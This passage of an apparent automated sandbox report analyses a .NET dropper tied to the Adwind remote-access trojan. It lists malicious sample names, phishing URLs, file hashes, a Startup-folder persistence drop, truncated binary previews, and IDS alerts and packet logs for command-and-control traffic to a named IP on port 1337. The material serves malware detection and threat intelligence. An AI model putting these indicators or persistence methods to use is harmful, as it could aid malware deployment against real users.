                                                                                    TIJYYlYJpv.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    CLOUDFLARENETUSQ5GN0fA8VQ.elfGet hashmaliciousBrowse
                                                                                    • 188.114.96.94
                                                                                    https://ipfs.io/ipfs/QmV5gNiwiin4C1wgqoymu9yvip9d74JSgsMtNSUasA9RgM?filename=g45-0gjr-w9hgn-w9djvgf-ethg-w9jgnf-9e3whrg-9j-9jff.htmlGet hashmaliciousBrowse
                                                                                    • 104.18.10.207
                                                                                    BJF4s7vOG9.exeGet hashmaliciousBrowse
                                                                                    • 188.114.96.3
                                                                                    mXLu3mpemv.elfGet hashmaliciousBrowse
                                                                                    • 172.68.237.107
                                                                                    https://ipfs.io/ipfs/bafkreihy36r32y5p6hxym7q7ocxusf4syhsbyhbz77rtvz7xdsfs6crnrm/#colin.pewarchuk@nfigroup.comGet hashmaliciousBrowse
                                                                                    • 172.67.74.213
                                                                                    2023-Hinckleyallen-Financial Report.htmlGet hashmaliciousBrowse
                                                                                    • 104.17.25.14
                                                                                    2023-Hinckleyallen-Financial Report.htmlGet hashmaliciousBrowse
                                                                                    • 104.17.24.14
                                                                                    https://docuspropls.durable.coGet hashmaliciousBrowse
                                                                                    • 104.17.25.14
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 188.114.96.3
                                                                                    bJyw.exeGet hashmaliciousBrowse
                                                                                    • 104.20.67.143
                                                                                    INVOICE_(Q322) ready for review JAN 31 2023 1000AM.htmGet hashmaliciousBrowse
                                                                                    • 104.18.28.91
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 188.114.96.3
                                                                                    FOB Shenzhen price for its MOQ.scr.exeGet hashmaliciousBrowse
                                                                                    • 104.21.64.20
                                                                                    https://webforms.ebizcharge.net/EBizSecureForm.aspx?pid=ecdf3fe8-6f71-448f-b913-169e94f58de6Get hashmaliciousBrowse
                                                                                    • 172.67.38.66
                                                                                    https://ipfs.io/ipfs/QmbugYFxQci7be4Trg2Ty2gTWeLRcnoP1gY6EicXTbG4Jd?filename=auto.html#Acarlson@drinkbodyarmor.comGet hashmaliciousBrowse
                                                                                    • 104.18.10.207
                                                                                    https://sourceforge.net/projects/processhacker/files/processhacker2/processhacker-2.39-setup.exe/downloadGet hashmaliciousBrowse
                                                                                    • 104.26.7.139
                                                                                    new_order_quotation_030022023000000000000000_PDF.exeGet hashmaliciousBrowse
                                                                                    • 104.21.58.223
                                                                                    shipping document.exeGet hashmaliciousBrowse
                                                                                    • 172.67.202.57
                                                                                    Benefits_Enrollment.htmGet hashmaliciousBrowse
                                                                                    • 104.18.10.207
                                                                                    https://compassgrp.durable.coGet hashmaliciousBrowse
                                                                                    • 104.17.25.14

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    3b5074b1b5d032e5620f69f9f700ff0ehttps://ipfs.io/ipfs/QmV5gNiwiin4C1wgqoymu9yvip9d74JSgsMtNSUasA9RgM?filename=g45-0gjr-w9hgn-w9djvgf-ethg-w9jgnf-9e3whrg-9j-9jff.htmlGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    • 162.159.137.232
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    • 162.159.137.232
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    • 162.159.137.232
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    • 162.159.137.232
                                                                                    XBrRZqGsEO.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    • 162.159.137.232
                                                                                    Fatura_8486472023.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    • 162.159.137.232
                                                                                    CV.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    • 162.159.137.232
                                                                                    Msconcepts22..........pdf.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    • 162.159.137.232
                                                                                    RFQ ORDER-T2190-CVE97.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    • 162.159.137.232
                                                                                    Msconcepts.............PDF.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    • 162.159.137.232
                                                                                    kIZkIsqBSq.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    • 162.159.137.232
                                                                                    AWB NO. 8148557141.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    • 162.159.137.232
                                                                                    2rOFsW8MAO.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    • 162.159.137.232
                                                                                    New Order.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    • 162.159.137.232
                                                                                    USD 46947,6 20230101162552.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    • 162.159.137.232
                                                                                    SecuriteInfo.com.Win32.PWSX-gen.23219.24986.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    • 162.159.137.232
                                                                                    e-dekont-20230127.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    • 162.159.137.232
                                                                                    PO-1012023.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    • 162.159.137.232
                                                                                    NEW PO.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    • 162.159.137.232
                                                                                    DOC.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    • 162.159.137.232

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\ProgramData\Oracle\Java\.oracle_jre_usage\cce3fe3b0d8d83e2.timestamp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):57
                                                                                    Entropy (8bit):4.880878391243856
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:oFj4I5vpN6yUe0rsyn:oJ5X6y/yn
                                                                                    MD5:12678D5BD359F74579E81CBB6148F53D
                                                                                    SHA1:BFE7F170726BB760BB346CB68C8EC001C9025FC8
                                                                                    SHA-256:66A77E0E9F46F842EC51F4DF20B714F1AE5FF3B8A09135B501302D854D9EAC31
                                                                                    SHA-512:35B7FA01B0F23513409B5185C0AF0E482AF0206F1B9D396783F636925DCDDDB48C99F7A7EA1D2FC2C0FACF12C3D45EDD75EB831E31CC57ACBC1200ABF3735ADF
                                                                                    Malicious:false
                                                                                    Preview:C:\Program Files (x86)\Java\jre1.8.0_211..1675485487553..

                                                                                    C:\Users\user\AppData\Local\Temp\jarva.jar

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\uBZeAVcb6r.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):655029
                                                                                    Entropy (8bit):7.961141310029578
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:pfl6Qk/o6QPy74HygORXgg/FRv+xM2NiRxgEhyR6b3Wu42ZcSvHDss:pf0QAAPm4SrXgg/S9iROmDWu1ZfvHDss
                                                                                    MD5:1B43933EF9FF4C07BD28E0A2466E9028
                                                                                    SHA1:B2371764235AED9407E6720DF619616F5FA5FBEB
                                                                                    SHA-256:0DFE638F3FFDFD9729EB8C03E033D56B3D0BA20860D06EE18BE1EB82537F0D5D
                                                                                    SHA-512:12BC6853D94B905EADA99D51CEA6F2B4D91F00B3E96E96057608C2FB102C0D8EF215C8666594B1D041DF2629227A284414A11AAE650C32E3451FB96BEB445F66
                                                                                    Malicious:false
                                                                                    Preview:PK..........9V............D...IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IIllIllllIIlIIII.class.<.@.G.......[.YPDD..*.x..D.....VD.....J.XcL.11....D...K.&.$...)........B.....x.v...k....9....>BH.A..@[..V.U^n.+G......(d..<N+..:..'..f3..#....q....q#..,*.5..RZ.f..-.qd@.Er..hd.9.c.*i5..8!..;......V....d8..`rp....f.....!"r....j5m.n..I.p..Z^PS...Z.d[d.2...Z..lC....dUM../GB..Q.............jK++...G......-.U..\D{..q....$....V....f&...Ix"Cq../B....82.b..f..r..H:...w.N.#..b.|......e...&.I..b"..+.Y.gF.#...E.......pmm..Bw..E.H..8a.vq+A.$.#..-.$.#..........|3.I.H,......k*.3..v..L...Z./G::.V..(..q.E..$...].....b.iv.;&..HOW.h...t.7.d..l...)1.7.N;z0..f..H.e......z...=B.F....U(.P.n"id.G.[<2.l.UXYQ[PZQ.YT..).....3I... # #...&..Z........S..(2.D....}:..5....o.v{]6.....Cg..9.A..i...>.+....).$.L0a.MDyk..=......d2..;.|;..!'....y;..^.t....#a.On.G...V...d.mK.L...2.../-Fo...............=.<.._.7..?6..G.@L......g`'......)....). ..UwQ..B..#..P=..f.................7Fr%j.G.

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):30720
                                                                                    Entropy (8bit):3.8570021095495353
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:bUpQt9rSl/xAaKRgJ6SoIrkvwKwq6u/oB:bBt9rwdCAt
                                                                                    MD5:94CCB92B775297F357670ABD1E6F754B
                                                                                    SHA1:50A9D6F7828C193C965FF9C5DF8BC290B06122A8
                                                                                    SHA-256:A4C3028EDDEA3F36439B4B4ABA7C1511F7B39DD0A92F38A282968D259D8E3286
                                                                                    SHA-512:A324DB4CB3027AD032096C429832955741DED336585F952B6C6FCB15C781CEAA25307981CF3A2708B2E4DC55610D7B487E492490BC08524EF2ACB5ADE6CFB34A
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{i............"...0..n..........~.... ........@.. ....................................`.................................*...O.......................................8............................................ ............... ..H............text....l... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B................^.......H........)..............hF..0E..........................................&.(......*...0..9........~.........,".r...p.....(....o....s............~.....+..*....0...........~.....+..*".......*.0...........~.....+..*".(.....*Vs....(....t.........*...}.....(.......(......{....%o ...r;..p(!...o"....*..*..*..ru..p(#...&.{....%o ...($...r...p(%...o"....*..r...p(#...&.{....%o ...($...r...p(%...o"....*..*&..(&....*..*...0..+.........,..{.......+....,...{....o'.......((....*..0..........

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\uBZeAVcb6r.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):30720
                                                                                    Entropy (8bit):3.8570021095495353
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:bUpQt9rSl/xAaKRgJ6SoIrkvwKwq6u/oB:bBt9rwdCAt
                                                                                    MD5:94CCB92B775297F357670ABD1E6F754B
                                                                                    SHA1:50A9D6F7828C193C965FF9C5DF8BC290B06122A8
                                                                                    SHA-256:A4C3028EDDEA3F36439B4B4ABA7C1511F7B39DD0A92F38A282968D259D8E3286
                                                                                    SHA-512:A324DB4CB3027AD032096C429832955741DED336585F952B6C6FCB15C781CEAA25307981CF3A2708B2E4DC55610D7B487E492490BC08524EF2ACB5ADE6CFB34A
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{i............"...0..n..........~.... ........@.. ....................................`.................................*...O.......................................8............................................ ............... ..H............text....l... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B................^.......H........)..............hF..0E..........................................&.(......*...0..9........~.........,".r...p.....(....o....s............~.....+..*....0...........~.....+..*".......*.0...........~.....+..*".(.....*Vs....(....t.........*...}.....(.......(......{....%o ...r;..p(!...o"....*..*..*..ru..p(#...&.{....%o ...($...r...p(%...o"....*..r...p(#...&.{....%o ...($...r...p(%...o"....*..*&..(&....*..*...0..+.........,..{.......+....,...{....o'.......((....*..0..........

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):3.8367705878411553
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                    File name:uBZeAVcb6r.exe
                                                                                    File size:30208
                                                                                    MD5:a5a4b316cc349db892a27c9b5429dd4e
                                                                                    SHA1:18e025e751a08d3af69bf8fbe26939bfa96c1668
                                                                                    SHA256:3065df9608a4d29f1cc7f4934ecd7445d83f6e5ecde5b7f8ecca656a7c384657
                                                                                    SHA512:a22fe0c4890acd1e72f3fc9fb95f22b4032473c37e86613ed6a7cde529286703132f186946294225b74ec8a69358d71a617ccda7bcaf5cf1603cf954d10bf7d6
                                                                                    SSDEEP:384:IUsQruz2H58mIajRgJTQo5pkvwKwq6u/FB:IGr42Z8c9vn
                                                                                    TLSH:86D2A31767BC8732F5762B765CA2C2800F75AE276854FA5F28C570BD1DB27008A12B6F
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..l..........*.... ........@.. ....................................`................................

                                                                                    File Icon

                                                                                    Icon Hash:00828e8e8686b000

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x408b2a
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0xF5B8D3D3 [Sat Aug 21 11:26:11 2100 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x8ad60x4f.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x5d4.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0000xc.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x8a440x38.text
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x20000x6b300x6c00False0.23734085648148148data3.8219555595431007IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0xa0000x5d40x600False0.4329427083333333data4.173971589658777IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0xc0000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountry
                                                                                    RT_VERSION0xa0900x344data
                                                                                    RT_MANIFEST0xa3e40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                                                    Imports

                                                                                    DLLImport
                                                                                    mscoree.dll_CorExeMain

                                                                                    Network Behavior

                                                                                    Snort IDS Alerts

                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                    192.168.2.323.94.99.1194968613372853043 02/03/23-20:38:56.354509TCP2853043ETPRO TROJAN Java/Adwind Variant Checkin496861337192.168.2.323.94.99.119
                                                                                    23.94.99.119192.168.2.31337496862853042 02/03/23-20:38:54.878115TCP2853042ETPRO TROJAN Java/Adwind Variant CnC Activity13374968623.94.99.119192.168.2.3
                                                                                    192.168.2.323.94.99.1194968613372853044 02/03/23-20:37:38.110801TCP2853044ETPRO TROJAN Java/Adwind Variant CnC Activity496861337192.168.2.323.94.99.119

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Feb 3, 2023 20:37:27.554063082 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:27.671852112 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.672173977 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:27.672785044 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:27.818530083 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.818583965 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.818620920 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.818650961 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.818677902 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.818732023 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.818778992 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.818798065 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:27.818814993 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.818826914 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:27.818854094 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.818860054 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:27.818890095 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.818958998 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:27.943967104 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.944070101 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.944128036 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.944139957 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:27.944175005 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.944217920 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:27.944221020 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.944278955 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.944318056 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:27.944336891 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.944401026 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.944438934 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:27.944453955 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.944516897 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.944552898 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:27.944585085 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.944649935 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.944689035 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:27.944700956 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.944751978 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.944788933 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:27.944791079 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:27.985382080 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:28.107825041 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.107863903 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.107882023 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.107899904 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.107919931 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.107938051 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.107958078 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.107985020 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108011007 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108035088 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108042955 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:28.108055115 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108078003 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:28.108081102 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108107090 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108108044 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:28.108124018 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:28.108130932 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108153105 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108175993 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108181953 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:28.108196020 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108217955 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:28.108218908 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108238935 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108251095 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108268976 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108285904 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:28.108293056 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108310938 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108324051 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:28.108338118 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108351946 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:28.108364105 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108388901 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108391047 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:28.108412027 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108437061 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108460903 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108467102 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:28.108485937 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108500957 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:28.108509064 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108530045 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:37:28.108535051 CET804968423.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:37:28.108557940 CET804968423.94.99.119192.168.2.3
